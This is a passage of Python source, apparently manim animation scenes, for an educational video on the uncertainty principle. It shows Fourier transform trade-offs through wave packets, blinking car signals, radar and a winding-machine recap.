stroke_width = 0,
fill_color = WHITE,
fill_opacity = 1,
)
self.move_to(post.get_top(), DOWN)
self.add_to_back(post)
###################
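# Opening scene: a position dot cloud and a momentum vector cloud sit under
# the title, each with a labeled 2-sigma brace, and their spreads are traded
# off against one another while the students react.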
class MentionUncertaintyPrinciple(TeacherStudentsScene):
def construct(self):
title = TextMobject("Heisenberg Uncertainty Principle")
title.to_edge(UP)
dot_cloud = ProbabalisticDotCloud()
vector_cloud = ProbabalisticVectorCloud(
gaussian_distribution_wrapper_config = {"sigma_x" : 0.2},
center_func = lambda : dot_cloud.gaussian_distribution_wrapper.get_parameters()[0],
)
for cloud in dot_cloud, vector_cloud:
cloud.gaussian_distribution_wrapper.next_to(
title, DOWN, 2*LARGE_BUFF
)
vector_cloud.gaussian_distribution_wrapper.shift(3*RIGHT)
def get_brace_text_group_update(gdw, vect, text, color):
brace = Brace(gdw, vect)
text = brace.get_tex("2\\sigma_{\\text{%s}}"%text, buff = SMALL_BUFF)
group = VGroup(brace, text)
def update_group(group):
brace, text = group
brace.match_width(gdw, stretch = True)
brace.next_to(gdw, vect)
text.next_to(brace, vect, buff = SMALL_BUFF)
group.set_color(color)
return Mobject.add_updater(group, update_group)
dot_brace_anim = get_brace_text_group_update(
dot_cloud.gaussian_distribution_wrapper,
DOWN, "position", dot_cloud.color
)
vector_brace_anim = get_brace_text_group_update(
vector_cloud.gaussian_distribution_wrapper,
UP, "momentum", vector_cloud.color
)
self.add(title)
self.add(dot_cloud)
self.play(
Write(title),
self.teacher.change, "raise_right_hand",
self.get_student_changes(*["pondering"]*3)
)
self.play(
Write(dot_brace_anim.mobject, run_time = 1)
)
self.add(dot_brace_anim)
self.wait()
# self.wait(2)
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 2,
)
self.wait()
self.add(vector_cloud)
self.play(
FadeIn(vector_brace_anim.mobject)
)
self.add(vector_brace_anim)
self.play(
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : RIGHT},
self.get_student_changes(*3*["confused"]),
run_time = 3,
)
#Back and forth
for x in range(2):
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 2*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 3,
)
self.change_student_modes("thinking", "erm", "sassy")
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 1*RIGHT},
run_time = 3,
)
self.wait()
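# The core demo: a wave packet (factor^0.25)*cos(4*TAU*t)*exp(-factor*(t - t0)^2)
# is drawn over time axes with its Fourier transform below, then the
# packet's width is swept through self.widths while both graphs update in
# lockstep, making the time/frequency trade-off visible.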
class FourierTradeoff(Scene):
CONFIG = {
"show_text" : True,
"complex_to_real_func" : lambda z : z.real,
"widths" : [6, 0.02, 1],
}
def construct(self):
#Setup axes
time_mean = 4
time_axes = Axes(
x_min = 0,
x_max = 2*time_mean,
x_axis_config = {"unit_size" : 1.5},
y_min = -2,
y_max = 2,
y_axis_config = {"unit_size" : 0.5}
)
time_label = TextMobject("Time")
time_label.scale(1.5)
time_label.next_to(
time_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
time_axes.add(time_label)
time_axes.center().to_edge(UP)
time_axes.x_axis.add_numbers(*list(range(1, 2*time_mean)))
frequency_axes = Axes(
x_min = 0,
x_max = 8,
x_axis_config = {"unit_size" : 1.5},
y_min = -0.025,
y_max = 0.075,
y_axis_config = {
"unit_size" : 30,
"tick_frequency" : 0.025,
},
color = TEAL,
)
frequency_label = TextMobject("Frequency")
frequency_label.scale(1.5)
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
frequency_label.set_color(FREQUENCY_COLOR)
frequency_axes.add(frequency_label)
frequency_axes.move_to(time_axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
frequency_axes.x_axis.add_numbers()
# Graph information
        # This tracker's value is the width of the wave_packet graph,
        # interpolated exponentially by ExponentialValueTracker
width_tracker = ExponentialValueTracker(0.5)
get_width = width_tracker.get_value
def get_wave_packet_function():
factor = 1./get_width()
return lambda t : (factor**0.25)*np.cos(4*TAU*t)*np.exp(-factor*(t-time_mean)**2)
def get_wave_packet():
graph = time_axes.get_graph(
get_wave_packet_function(),
num_graph_points = 200,
)
graph.set_color(YELLOW)
return graph
time_radius = 10
def get_wave_packet_fourier_transform():
return get_fourier_graph(
frequency_axes,
get_wave_packet_function(),
t_min = time_mean - time_radius,
t_max = time_mean + time_radius,
n_samples = 2*time_radius*17,
complex_to_real_func = self.complex_to_real_func,
color = FREQUENCY_COLOR,
)
wave_packet = get_wave_packet()
wave_packet_update = UpdateFromFunc(
wave_packet,
lambda g : Transform(g, get_wave_packet()).update(1)
)
fourier_graph = get_wave_packet_fourier_transform()
fourier_graph_update = UpdateFromFunc(
fourier_graph,
lambda g : Transform(g, get_wave_packet_fourier_transform()).update(1)
)
arrow = Arrow(
wave_packet, frequency_axes.coords_to_point(
4, frequency_axes.y_max/2,
),
color = FREQUENCY_COLOR,
)
fourier_words = TextMobject("Fourier Transform")
fourier_words.next_to(arrow, LEFT, buff = MED_LARGE_BUFF)
sub_words = TextMobject("(To be explained shortly)")
sub_words.set_color(BLUE)
sub_words.scale(0.75)
sub_words.next_to(fourier_words, DOWN)
#Draw items
self.add(time_axes, frequency_axes)
self.play(ShowCreation(wave_packet, rate_func = double_smooth))
anims = [ReplacementTransform(
wave_packet.copy(), fourier_graph
)]
if self.show_text:
anims += [
GrowArrow(arrow),
Write(fourier_words, run_time = 1)
]
self.play(*anims)
# self.play(FadeOut(arrow))
self.wait()
for width in self.widths:
self.play(
width_tracker.set_value, width,
wave_packet_update,
fourier_graph_update,
run_time = 3
)
if sub_words not in self.mobjects and self.show_text:
self.play(FadeIn(sub_words))
else:
self.wait()
self.wait()
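# Table-of-contents scene: lists the three uncertainty flavors (sound,
# Doppler radar, quantum particles) and checks each off with a small
# animation; the quantum one only earns a qualified "...ish" checkmark.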
class ShowPlan(PiCreatureScene):
def construct(self):
self.add_title()
words = self.get_words()
self.play_sound_anims(words[0])
self.play_doppler_anims(words[1])
self.play_quantum_anims(words[2])
def add_title(self):
title = TextMobject("The plan")
title.scale(1.5)
title.to_edge(UP)
h_line = Line(LEFT, RIGHT).scale(FRAME_X_RADIUS)
h_line.next_to(title, DOWN)
self.add(title, h_line)
def get_words(self):
trips = [
("sound waves", "(time vs. frequency)", YELLOW),
("Doppler radar", "(distance vs. velocity)", GREEN),
("quantum particles", "(position vs. momentum)", BLUE),
]
words = VGroup()
for topic, tradeoff, color in trips:
word = TextMobject("Uncertainty for", topic, tradeoff)
word[1:].set_color(color)
word[2].scale(0.75)
word[2].next_to(word[1], DOWN, buff = 1.5*SMALL_BUFF)
words.add(word)
words.arrange(DOWN, aligned_edge = LEFT, buff = MED_LARGE_BUFF)
words.to_edge(LEFT)
return words
def play_sound_anims(self, word):
morty = self.pi_creature
wave = FunctionGraph(
lambda x : 0.3*np.sin(15*x)*np.sin(0.5*x),
x_min = 0, x_max = 30,
step_size = 0.001,
)
wave.next_to(word, RIGHT)
rect = BackgroundRectangle(wave, fill_opacity = 1)
rect.stretch(2, 1)
rect.next_to(wave, LEFT, buff = 0)
always_shift(wave, direction=LEFT, rate=5)
wave_fader = UpdateFromAlphaFunc(
wave,
lambda w, a : w.set_stroke(width = 3*a)
)
checkmark = self.get_checkmark(word)
self.add(wave)
self.add_foreground_mobjects(rect, word)
self.play(
Animation(word),
wave_fader,
morty.change, "raise_right_hand", word
)
self.wait(2)
wave_fader.rate_func = lambda a : 1-smooth(a)
self.add_foreground_mobjects(checkmark)
self.play(
Write(checkmark),
morty.change, "happy",
wave_fader,
)
self.remove_foreground_mobjects(rect, word)
self.add(word)
self.wait()
def play_doppler_anims(self, word):
morty = self.pi_creature
radar_dish = RadarDish()
radar_dish.next_to(word, DOWN, aligned_edge = LEFT)
target = Plane()
# target.match_height(radar_dish)
target.next_to(radar_dish, RIGHT, buff = LARGE_BUFF)
always_shift(target, direction = RIGHT, rate = 1.25)
pulse = RadarPulse(radar_dish, target)
checkmark = self.get_checkmark(word)
self.add(target)
self.play(
Write(word),
DrawBorderThenFill(radar_dish),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = a)
),
morty.change, "pondering",
run_time = 1
)
self.add(pulse)
count = it.count() #TODO, this is not a great hack...
while not pulse.is_finished() and next(count) < 15:
self.play(
morty.look_at, pulse.mobject,
run_time = 0.5
)
self.play(
Write(checkmark),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = 1-a)
),
FadeOut(radar_dish),
morty.change, "happy"
)
self.wait()
def play_quantum_anims(self, word):
morty = self.pi_creature
dot_cloud = ProbabalisticDotCloud()
gdw = dot_cloud.gaussian_distribution_wrapper
gdw.next_to(word, DOWN, MED_LARGE_BUFF)
gdw.rotate(5*DEGREES)
gdw.save_state()
gdw.scale(0)
checkmark = self.get_checkmark(word)
ish = TextMobject("$\\dots$ish")
ish.next_to(checkmark, RIGHT, -SMALL_BUFF, DOWN)
self.add(dot_cloud)
self.play(
Write(word),
FadeIn(dot_cloud.mobject),
morty.change, "confused",
)
self.play(gdw.restore, run_time = 2)
self.play(Write(checkmark))
self.wait()
self.play(
Write(ish),
morty.change, 'maybe'
)
self.wait(6)
##
def get_checkmark(self, word):
checkmark = TexMobject("\\checkmark")
checkmark.set_color(GREEN)
checkmark.scale(1.25)
checkmark.next_to(word[1], UP+RIGHT, buff = 0)
return checkmark
class StartWithIntuition(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"You already \\\\ have this \\\\ intuition",
bubble_kwargs = {
"height" : 3.5,
"width" : 3,
},
)
self.change_student_modes("pondering", "erm", "maybe")
self.look_at(VectorizedPoint(4*LEFT + 2*UP))
self.wait(5)
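# Two cars blink their turn signals at a red light: a short observation
# window gives a wide, low-confidence frequency estimate, while a long
# window sharpens it, previewing the uncertainty trade-off with no math.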
class TwoCarsAtRedLight(Scene):
CONFIG = {
"text_scale_val" : 0.75,
}
def construct(self):
self.pull_up_behind()
self.flash_in_sync_short_time()
self.show_low_confidence()
self.flash_in_sync_long_time()
self.show_high_confidence()
def pull_up_behind(self):
#Setup Traffic light
traffic_light = TrafficLight()
traffic_light.move_to(6*RIGHT + 2.5*DOWN, DOWN)
source_point = VectorizedPoint(
traffic_light[2].get_right()
)
screen = Line(ORIGIN, UP)
screen.next_to(source_point, RIGHT, LARGE_BUFF)
red_light = Spotlight(
color = RED,
source_point = source_point,
radius = 0.5,
screen = screen,
num_levels = 20,
opacity_function = lambda r : 1/(10*r**2+1)
)
red_light.fade(0.5)
red_light.rotate(TAU/2, about_edge = LEFT)
self.add(red_light, traffic_light)
#Setup cars
car1, car2 = cars = self.cars = VGroup(*[
Car() for x in range(2)
])
cars.arrange(RIGHT, buff = LARGE_BUFF)
cars.next_to(
traffic_light, LEFT,
buff = LARGE_BUFF, aligned_edge = DOWN
)
car2.pi_creature.set_color(GREY_BROWN)
car1.start_point = car1.get_corner(DOWN+RIGHT)
car1.shift(FRAME_X_RADIUS*LEFT)
#Pull up car
self.add(cars)
self.play(
SwitchOn(
red_light,
rate_func = squish_rate_func(smooth, 0, 0.3),
),
Animation(traffic_light),
self.get_flashes(car2, num_flashes = 3),
MoveCar(
car1, car1.start_point,
run_time = 3,
rate_func = rush_from,
)
)
def flash_in_sync_short_time(self):
car1, car2 = cars = self.cars
#Setup axes
axes = Axes(
x_min = 0,
x_max = 5,
y_min = 0,
y_max = 2,
y_axis_config = {
"tick_frequency" : 0.5,
},
)
axes.x_axis.add_numbers(1, 2, 3)
time_label = TextMobject("Time")
time_label.scale(self.text_scale_val)
time_label.next_to(axes.x_axis.get_right(), DOWN)
y_title = TextMobject("Signal")
y_title.scale(self.text_scale_val)
y_title.next_to(axes.y_axis, UP, SMALL_BUFF)
axes.add(time_label, y_title)
axes.to_corner(UP+LEFT, buff = MED_SMALL_BUFF)
graph = axes.get_graph(
self.get_multispike_function(list(range(1, 4))),
x_min = 0.8,
x_max = 3.8,
)
graph.set_color(YELLOW)
#Label short duration
brace = Brace(Line(
axes.input_to_graph_point(1, graph),
axes.input_to_graph_point(3, graph),
), UP)
text = TextMobject("Short duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, SMALL_BUFF)
text.align_to(
axes.coords_to_point(0.25, 0), LEFT
)
self.play(
self.get_flashes(car1, num_flashes = 2),
self.get_flashes(car2, num_flashes = 2),
LaggedStartMap(FadeIn, VGroup(
axes, time_label, y_title,
))
)
self.play(
self.get_flashes(car1, num_flashes = 3),
self.get_flashes(car2, num_flashes = 3),
ShowCreation(graph, rate_func=linear, run_time = 3)
)
self.play(
self.get_flashes(car1, num_flashes = 10),
self.get_flashes(car2, num_flashes = 10, run_time_per_flash = 0.98),
GrowFromCenter(brace),
Write(text),
)
self.time_axes = axes
self.time_graph = graph
self.time_graph_label = VGroup(
brace, text
)
def show_low_confidence(self):
car1, car2 = cars = self.cars
time_axes = self.time_axes
#Setup axes
frequency_axes = Axes(
x_min = 0,
x_max = 3,
y_min = 0,
y_max = 1.5,
y_axis_config = {
"tick_frequency" : 0.5,
}
)
frequency_axes.next_to(time_axes, DOWN, LARGE_BUFF)
frequency_axes.set_color(LIGHT_GREY)
frequency_label = TextMobject("Frequency")
frequency_label.scale(self.text_scale_val)
frequency_label.next_to(frequency_axes.x_axis.get_right(), DOWN)
frequency_axes.add(
frequency_label,
VectorizedPoint(frequency_axes.y_axis.get_top())
)
frequency_axes.x_axis.add_numbers(1, 2)
frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-4*(x-1)**2),
x_min = 0,
x_max = 2,
)
frequency_graph.set_color(RED)
peak_point = frequency_axes.input_to_graph_point(
1, frequency_graph
)
#Setup label
label = TextMobject("Low confidence")
label.scale(self.text_scale_val)
label.move_to(peak_point + UP+RIGHT, DOWN)
label.match_color(frequency_graph)
arrow = Arrow(label.get_bottom(), peak_point, buff = 2*SMALL_BUFF)
arrow.match_color(frequency_graph)
self.play(
ReplacementTransform(
self.time_axes.copy(), frequency_axes
),
ReplacementTransform(
self.time_graph.copy(), frequency_graph
),
)
self.play(
Write(label),
GrowArrow(arrow)
)
self.wait()
self.frequency_axes = frequency_axes
self.frequency_graph = frequency_graph
self.frequency_graph_label = VGroup(
label, arrow
)
def flash_in_sync_long_time(self):
time_graph = self.time_graph
time_axes = self.time_axes
frequency_graph = self.frequency_graph
frequency_axes = self.frequency_axes
n_spikes = 12
new_time_graph = time_axes.get_graph(
self.get_multispike_function(list(range(1, n_spikes+1))),
x_min = 0.8,
x_max = n_spikes + 0.8,
)
new_time_graph.match_color(time_graph)
new_frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-500*(x-1)**2),
x_min = 0,
x_max = 2,
num_anchors = 500,
)
new_frequency_graph.match_color(self.frequency_graph)
def pin_freq_graph_end_points(freq_graph):
freq_graph.points[0] = frequency_axes.coords_to_point(0, 0)
freq_graph.points[-1] = frequency_axes.coords_to_point(2, 0)
self.play(LaggedStartMap(
FadeOut, VGroup(
self.time_graph_label,
self.frequency_graph_label,
self.time_graph,
)
))
self.play(
ApplyMethod(
self.time_axes.x_axis.stretch, 2.5, 0,
{"about_edge" : LEFT},
run_time = 4,
rate_func = squish_rate_func(smooth, 0.3, 0.6),
),
UpdateFromFunc(
self.time_axes.x_axis.tip,
lambda m : m.move_to(
self.time_axes.x_axis.get_right(),
LEFT
)
),
ShowCreation(
new_time_graph,
run_time = n_spikes,
rate_func=linear,
),
ApplyMethod(
frequency_graph.stretch, 0.1, 0,
run_time = n_spikes,
),
UpdateFromFunc(frequency_graph, pin_freq_graph_end_points),
*[
self.get_flashes(car, num_flashes = n_spikes)
for car in self.cars
]
)
self.new_time_graph = new_time_graph
self.new_frequency_graph = new_frequency_graph
def show_high_confidence(self):
#Frequency stuff
arrow = self.frequency_graph_label[1]
label = TextMobject("High confidence")
label.scale(self.text_scale_val)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(arrow)
frequency_axes = self.frequency_axes
#Time stuff
new_time_graph = self.new_time_graph
brace = Brace(new_time_graph, UP, buff = SMALL_BUFF)
text = TextMobject("Long duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, buff = SMALL_BUFF)
self.play(
FadeIn(label),
GrowArrow(arrow),
*list(map(self.get_flashes, self.cars))
)
self.play(
GrowFromCenter(brace),
Write(text, run_time = 1),
*list(map(self.get_flashes, self.cars))
)
self.play(*[
self.get_flashes(car, num_flashes = 10)
for car in self.cars
])
###
    def get_flashes(self, car, colors = (YELLOW, RED), num_flashes = 1, **kwargs):
return AnimationGroup(*[
MultipleFlashes(light, color, num_flashes = num_flashes, **kwargs)
for light, color in zip(car.get_lights(), colors)
])
def get_multispike_function(self, spike_times):
return lambda x : sum([
1.25*np.exp(-100*(x-m)**2)
for m in spike_times
])
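# Morphs a single sinusoid through three envelope widths, labeling how
# clearly each one pins down a frequency, then states the correlation claim:
# short signals correlate with a wide range of frequencies, and only wide
# signals correlate with a narrow range.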
class VariousMusicalNotes(Scene):
def construct(self):
freq = 20
        # The tracker holds a, where the bell-curve envelope of the signal
        # is exp(-a*x**2); ExponentialValueTracker interpolates its value
        # multiplicatively, i.e. linearly in log(a)
graph_width_tracker = ExponentialValueTracker(1)
def get_graph():
a = graph_width_tracker.get_value()
return FunctionGraph(
lambda x : np.exp(-a*x**2)*np.sin(freq*x)-0.5,
step_size = 0.001,
)
graph = get_graph()
def graph_update(graph):
graph.points = get_graph().points
graph_update_anim = UpdateFromFunc(graph, graph_update)
def change_width_anim(width, **kwargs):
a = 2.0/(width**2)
return AnimationGroup(
ApplyMethod(graph_width_tracker.set_value, a),
graph_update_anim,
**kwargs
)
change_width_anim(FRAME_X_RADIUS).update(1)
graph_update_anim.update(0)
phrases = [
TextMobject(*words.split(" "))
for words in [
"Very clear frequency",
"Less clear frequency",
"Extremely unclear frequency",
]
]
#Show graphs and phrases
widths = [FRAME_X_RADIUS, 1, 0.2]
for width, phrase in zip(widths, phrases):
brace = Brace(Line(LEFT, RIGHT), UP)
brace.stretch(width, 0)
brace.next_to(graph.get_center(), UP, buff = 1.2)
phrase.next_to(brace, UP)
if width is widths[0]:
                self.play(ShowCreation(graph, rate_func=linear))
self.play(
GrowFromCenter(brace),
Write(phrase, run_time = 1)
)
else:
self.play(
change_width_anim(width),
ReplacementTransform(
VGroup(last_phrase, last_brace),
VGroup(phrase, brace),
rate_func = squish_rate_func(smooth, 0.5, 1),
),
run_time = 2
)
self.wait()
# self.play(*map(FadeOut, [graph, brace, phrase]))
last_phrase = phrase
last_brace = brace
#Talk about correlations
short_signal_words = TextMobject(
"Short", "signal", "correlates",
"with", "wide range", "of frequencies"
)
long_signal_words = TextMobject(
"Only", "wide", "signals", "correlate",
"with a", "short range", "of frequencies"
)
phrases = VGroup(short_signal_words, long_signal_words)
for phrase in phrases:
phrase.scale(0.8)
phrase.set_color_by_tex_to_color_map({
"short" : RED,
"long" : GREEN,
"wide" : GREEN,
}, case_sensitive = False)
phrases.arrange(DOWN)
phrases.to_edge(UP)
long_graph = FunctionGraph(
lambda x : 0.5*np.sin(freq*x),
x_min = -FRAME_WIDTH,
x_max = FRAME_WIDTH,
            step_size = 0.001,  # matches the FunctionGraph call earlier in this file; "n_components" appears to be a typo
)
long_graph.set_color(BLUE)
long_graph.next_to(graph, UP, MED_LARGE_BUFF)
self.play(
ShowCreation(long_graph),
*list(map(FadeOut, [last_brace, last_phrase]))
)
self.play(
Write(short_signal_words),
change_width_anim(widths[2])
)
self.play(
long_graph.stretch, 0.35, 0,
long_graph.set_color, GREEN,
run_time = 5,
rate_func = wiggle
)
self.wait()
self.play(
Write(long_signal_words),
change_width_anim(widths[0]),
)
self.play(
long_graph.stretch, 0.95, 0,
long_graph.set_color, average_color(GREEN, BLUE),
run_time = 4,
rate_func = wiggle
)
self.wait()
class CrossOutDefinitenessAndCertainty(TeacherStudentsScene):
def construct(self):
words = VGroup(
TextMobject("Definiteness"),
TextMobject("Certainty"),
)
words.arrange(DOWN)
words.next_to(self.teacher, UP+LEFT)
crosses = VGroup(*list(map(Cross, words)))
self.add(words)
self.play(
self.teacher.change, "sassy",
ShowCreation(crosses[0])
)
self.play(
self.get_student_changes(*3*["erm"]),
ShowCreation(crosses[1])
)
self.wait(2)
class BringInFourierTranform(TeacherStudentsScene):
def construct(self):
fourier = TextMobject("Fourier")
fourier.scale(1.5)
fourier.next_to(self.teacher.get_corner(UP+LEFT), UP, LARGE_BUFF)
fourier.save_state()
fourier.shift(DOWN)
fourier.fade(1)
self.play(
self.teacher.change, "raise_right_hand",
fourier.restore
)
self.change_student_modes("happy", "erm", "confused")
self.look_at(3*LEFT + 2*UP)
self.wait(3)
class LastVideoWrapper(Scene):
def construct(self):
title = TextMobject("Visualizing the Fourier Transform")
title.to_edge(UP)
screen_rect = ScreenRectangle(height = 6)
screen_rect.next_to(title, DOWN)
self.add(title)
self.play(ShowCreation(screen_rect))
self.wait()
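# Recap of the previous video's winding-machine picture: wrap the signal
# around a circle at a tunable winding frequency, track the center of mass,
# and sweep the frequency to trace out the Fourier plot, spike and all.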
class FourierRecapScene(DrawFrequencyPlot):
CONFIG = {
"frequency_axes_config" : {
"x_max" : 10.0,
"x_axis_config" : {
"unit_size" : 0.7,
"numbers_to_show" : list(range(1, 10, 1)),
}
},
"initial_winding_frequency" : 0.1,
}
def construct(self):
self.setup_axes()
self.preview_fourier_plot()
self.wrap_signal_around_circle()
self.match_winding_to_beat_frequency()
self.follow_center_of_mass()
self.draw_fourier_plot()
self.set_color_spike()
def setup_axes(self):
self.remove(self.pi_creature)
time_axes = self.get_time_axes()
time_axes.to_edge(UP, buff = MED_SMALL_BUFF)
time_axes.scale(0.9, about_edge = UP)
frequency_axes = self.get_frequency_axes()
circle_plane = self.get_circle_plane()
self.add(time_axes)
self.set_variables_as_attrs(
time_axes, frequency_axes,
circle_plane
)
def preview_fourier_plot(self):
time_graph = self.graph = self.get_time_graph(
width = 2,
num_graph_points = 200,
)
fourier_graph = self.get_fourier_transform_graph(
time_graph
)
fourier_graph.pointwise_become_partial(fourier_graph, 0.1, 1)
#labels
signal_label = TextMobject("Signal")
fourier_label = TextMobject("Fourier transform")
signal_label.next_to(time_graph, UP, buff = SMALL_BUFF)
fourier_label.next_to(fourier_graph, UP)
fourier_label.match_color(fourier_graph)
self.play(
ShowCreation(time_graph, run_time = 2),
Write(signal_label),
)
self.wait()
self.play(
LaggedStartMap(FadeIn, self.frequency_axes),
ReplacementTransform(
time_graph.copy(),
fourier_graph,
run_time = 2
),
ReplacementTransform(
signal_label.copy(),
fourier_label,
run_time = 2,
rate_func = squish_rate_func(smooth, 0.5, 1)
),
)
self.wait()
self.play(LaggedStartMap(
Indicate, self.frequency_axes.x_axis.numbers,
run_time = 4,
rate_func = wiggle,
))
self.wait()
self.play(*list(map(FadeOut, [
self.frequency_axes, fourier_graph,
signal_label, fourier_label,
])))
self.time_graph = time_graph
self.set_variables_as_attrs(time_graph, fourier_label)
def wrap_signal_around_circle(self):
time_graph = self.time_graph
circle_plane = self.circle_plane
freq = self.initial_winding_frequency
pol_graph = self.get_polarized_mobject(time_graph, freq)
winding_freq_label = self.get_winding_frequency_label()
winding_freq_label.add_to_back(BackgroundRectangle(winding_freq_label))
winding_freq_label.move_to(circle_plane.get_top(), DOWN)
self.add_foreground_mobjects(winding_freq_label)
self.play(
Write(circle_plane, run_time = 1),
ReplacementTransform(
time_graph.copy(), pol_graph,
path_arc = -TAU/4,
run_time_per_flash = 2,
run_time = 2,
),
FadeIn(winding_freq_label),
)
freq = 0.3
self.change_frequency(freq, run_time = 2)
ghost_pol_graph = pol_graph.copy()
self.remove(pol_graph)
self.play(ghost_pol_graph.set_stroke, {"width" : 0.5})
self.play(
*self.get_vector_animations(time_graph),
run_time = 15
)
self.remove(ghost_pol_graph)
self.wait()
def match_winding_to_beat_frequency(self):
self.v_lines_indicating_periods = self.get_v_lines_indicating_periods(0.3)
self.add(self.v_lines_indicating_periods)
for freq in range(1, 6):
self.change_frequency(freq, run_time = 5)
self.play(
*self.get_vector_animations(
self.time_graph,
draw_polarized_graph = False
),
run_time = 10
)
self.wait()
def follow_center_of_mass(self):
com_dot = self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
com_arrow = Arrow(UP+3*RIGHT, ORIGIN)
com_arrow.shift(com_dot.get_center())
com_arrow.match_color(com_dot)
com_words = TextMobject("Center of mass")
com_words.next_to(com_arrow.get_start(), UP)
com_words.match_color(com_arrow)
com_words.add_background_rectangle()
com_dot.save_state()
com_dot.move_to(com_arrow.get_start())
com_dot.fade(1)
self.play(
com_dot.restore,
GrowArrow(com_arrow, rate_func = squish_rate_func(smooth, 0.2, 1)),
Write(com_words),
)
self.wait()
squished_func = squish_rate_func(smooth, 0, 0.2)
self.change_frequency(
4,
added_anims = [
FadeOut(com_arrow, rate_func = squished_func),
FadeOut(com_words, rate_func = squished_func),
],
run_time = 5
)
def draw_fourier_plot(self):
frequency_axes = self.frequency_axes
fourier_label = self.fourier_label
self.change_frequency(0, run_time = 2)
self.play(
FadeIn(frequency_axes),
FadeIn(fourier_label),
)
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.get_fourier_graph_drawing_update_anim(fourier_graph)
self.generate_fourier_dot_transform(fourier_graph)
self.change_frequency(5, run_time = 20)
self.wait()
self.change_frequency(7.5, run_time = 10)
self.fourier_graph_drawing_update_anim = Animation(Mobject())
self.fourier_graph = fourier_graph
def set_color_spike(self):
spike_point = self.frequency_axes.input_to_graph_point(
5, self.fourier_graph
)
circle = Circle(color = YELLOW, radius = 0.25)
circle.move_to(spike_point)
circle.save_state()
circle.scale(5)
circle.fade(1)
self.change_frequency(5)
self.play(circle.restore)
self.play(FadeOut(circle))
self.wait()
for x in range(2):
self.change_frequency(5.2, run_time = 3)
self.change_frequency(4.8, run_time = 3)
self.change_frequency(5, run_time = 1.5)
self.wait()
#########
def get_time_graph(self, frequency = 5, width = 2, **kwargs):
# low_x = center-width/2
# high_x = center+width/2
# new_smooth = lambda x : np.clip(smooth((x+0.5)), 0, 1)
# def func(x):
# pure_signal = 0.9*np.cos(TAU*frequency*x)
# factor = new_smooth(x - low_x) - new_smooth(x-high_x)
# return 1 + factor*pure_signal
graph = self.time_axes.get_graph(
lambda x : 1+0.9*np.cos(TAU*frequency*x),
x_min = 0, x_max = width,
**kwargs
)
graph.set_color(YELLOW)
return graph
class RealPartOfInsert(Scene):
def construct(self):
words = TextMobject("(Real part of the)")
words.set_color(RED)
self.add(words)
self.play(Write(words))
self.wait(5)
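# Zooms into the winding plane to unpack the center-of-mass readout: the
# dot's distance from the origin is labeled as the strength of a frequency,
# and rotating the dot sweeps out the angle theta it makes with the axis.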
class CenterOfMassDescription(FourierRecapScene):
def construct(self):
self.remove(self.pi_creature)
circle_plane = self.get_circle_plane()
circle_plane.save_state()
circle_plane.generate_target()
circle_plane.target.set_height(FRAME_HEIGHT)
circle_plane.target.center()
circle_plane.target.axes.set_stroke(width = 2)
        circle_plane.target.main_lines.set_stroke(width = 2)  # presumably the plane's main grid lines; "targets" was a typo
circle_plane.target.secondary_lines.set_stroke(width = 1)
start_coords = (0.5, 0.5)
alt_coords = (0.8, 0.8)
com_dot = Dot(color = self.center_of_mass_color)
com_dot.move_to(circle_plane.coords_to_point(*start_coords))
self.add(circle_plane, com_dot)
self.wait()
self.play(
MoveToTarget(circle_plane),
com_dot.move_to,
circle_plane.target.coords_to_point(*start_coords)
)
self.wait()
alt_com_dot = com_dot.copy().move_to(
circle_plane.coords_to_point(*alt_coords)
)
for dot in com_dot, alt_com_dot:
line = Line(ORIGIN, dot.get_center())
line.match_color(com_dot)
angle = line.get_angle()
line.rotate(-angle, about_point = ORIGIN)
brace = Brace(line, UP)
words = brace.get_text("Strength of frequency")
words.add_background_rectangle()
dot.length_label_group = VGroup(line, brace, words)
dot.length_label_group.rotate(angle, about_point = ORIGIN)
line, brace, words = com_dot.length_label_group
self.play(
GrowFromCenter(line),
GrowFromCenter(brace),
FadeIn(words),
)
self.wait()
self.play(
Transform(
com_dot.length_label_group,
alt_com_dot.length_label_group,
),
Transform(com_dot, alt_com_dot),
rate_func = there_and_back,
run_time = 4,
)
#Do rotation
line = com_dot.length_label_group[0]
com_dot.length_label_group.remove(line)
angle = line.get_angle()
arc, alt_arc = [
Arc(
start_angle = 0,
angle = factor*angle,
radius = 0.5,
)
for factor in (1, 2)
]
theta = TexMobject("\\theta")
theta.shift(1.5*arc.point_from_proportion(0.5))
self.play(
FadeOut(com_dot.length_label_group),
Animation(line),
ShowCreation(arc),
Write(theta)
)
self.play(
Rotate(
VGroup(line, com_dot),
angle, about_point = ORIGIN
),
Transform(arc, alt_arc),
theta.move_to, 1.5*alt_arc.point_from_proportion(0.5),
rate_func = there_and_back,
run_time = 4
)
self.wait()
class AskAboutLongVsShort(TeacherStudentsScene):
def construct(self):
self.student_says(
"What happens if we \\\\ change the length of \\\\ the signal?",
student_index = 2,
)
self.play(
self.teacher.change, "happy",
self.get_student_changes("pondering", "confused", "raise_right_hand")
)
self.wait(5)
class LongAndShortSignalsInWindingMachine(FourierRecapScene):
CONFIG = {
"num_fourier_graph_points" : 1000,
}
def construct(self):
self.setup_axes()
self.extend_for_long_time()
self.note_sharp_fourier_peak()
self.very_short_signal()
self.note_wide_fourier_peak()
def setup_axes(self):
FourierRecapScene.setup_axes(self)
